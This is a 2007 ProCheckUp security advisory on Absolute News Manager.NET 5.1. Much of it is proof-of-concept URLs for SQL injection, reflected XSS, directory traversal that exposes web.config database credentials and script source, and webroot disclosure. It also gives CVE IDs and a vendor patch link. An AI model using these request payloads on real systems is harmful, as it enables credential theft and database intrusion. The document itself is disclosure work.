Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection

Vulnerability found:
16 November 2007


Vendor informed:
19 November 2007

Severity level:
High

Credits:
Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd (www.procheckup.com) ProCheckUp thanks Xigla Software for working with us.

Description:
Multiple vulnerabilities were found on Absolute News Manager.NET 5.1:
- unauthenticated file retrieval (directory traversal) on '/pages/default.aspx'
- unauthenticated SQL injection on 'xlaabsolutenm.aspx' and possibly '/pages/default.aspx'
- XSS on 'xlaabsolutenm.aspx' and '/pages/default.aspx'
- webroot disclosure on 'getpath.aspx'

SQL injection PoCs

Vulnerable script: /[CustomerDefinedDir]/xlaabsolutenm.aspx

Vulnerable parameters: z, pz, ord, sort
Requesting the following URL returns the version of Windows and SQL server:
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sor

t=posted&rmore=-&
System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'Microsoft SQL

Server 2005 - 9.00.3042.00 (Intel X86)
Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2

(Build 3790: Service Pack 2) ' to data type int.
Other URLs:
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_

PAYLOAD&rmore=-&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=

headline&rmore=-&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=

headline&rmore=-&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1

em&target=iframe&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED

_PAYLOAD&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&

sort=headline&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&

sort=headline&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&

sort=headline&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_

PAYLOAD&featured=n&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=

posted&featured=n&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted

INJECTED_PAYLOAD&rmore=-&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_

PAYLOAD&sort=posted&rmore=-&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=

n&ord=desc&sort=posted&rmore=-&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=

posted&featured=n&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=

only&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=

n&ord=desc&sort=posted&rmore=-&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_

PAYLOAD&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort

=posted&

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort

=posted&
The script '/pages/default.aspx' might also be vulnerable to SQL injection but it has not been confirmed.
Requesting the following URLs:
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=40&z=9999999999999

http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=9999999999999&z=1
return the following error:
System.Data.SqlClient.SqlException: Error converting data type nvarchar to int.

BID

26692

Consequences
Contents of any files on the web server can be obtained. Unauthorized SQL queries can be injected. Scripting code can be run within the security context of the target domain. Information about the target environment can be extracted.
XSS PoCs
Vulnerable script: '/xlaabsolutenm.aspx'

Unsanitized parameter: 'rmore'
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=articleID&ord=desc&rmore=%3C

script%3Ealert(1)%3C/script%3E&size=2&h=abc&isframe=y
Vulnerable script: '/pages/default.aspx'

Unsanitized parameter: 'template'
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ealert(2)%3C/script%3E

Webroot PoC

Requesting the 'getpath.aspx' demo script discloses the physical path of the webroot - ie:
http://target.tld/[CustomerDefinedDir]/getpath.aspx
"

Absolute News Manager Physical Path :

D:\inetpub\target.tld\[CustomerDefinedDir]\
Please delete this file from your installation.

"

CVE reference

CVE-2007-6268 CVE-2007-6269 CVE-2007-6270
CVE-2007-6271

File retrieval PoC

The following URL shows the contents of .NET 'web.config' (contains DB credentials):

http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=../web.config
The following URL show contents of the vulnerable script:

http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=default.aspx%00
Note: in order to obtain the content of '.aspx' files, a null byte '%00' must be added after the filename.
Show content of other scripts:
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer.ascx%00

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../default.aspx%00

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../PPL1HistoryTicker.aspx%00

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx%00

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolutenm.aspx%00

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../streamconfig.aspx%00

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../articlefiles/r.asp%00

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00

How to fix:
http://www.xigla.com/security/

http://www.xigla.com/security/ANMNET51-SecurityUpdate20071128.zip
Note: ProCheckUp has NOT tested the patch provided by Xigla Software.

References:
http://www.xigla.com/absolutenmnet/

Legal:
Copyright 2007 ProCheckUp Ltd.
All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if the Bulletin is not changed or edited in any way, is attributed to ProCheckUp indicating this web page URL, and provided such reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited.
ProCheckUp is not liable for any misuse of this information by any third party. ProCheckUp is not responsible for the content of external Internet sites.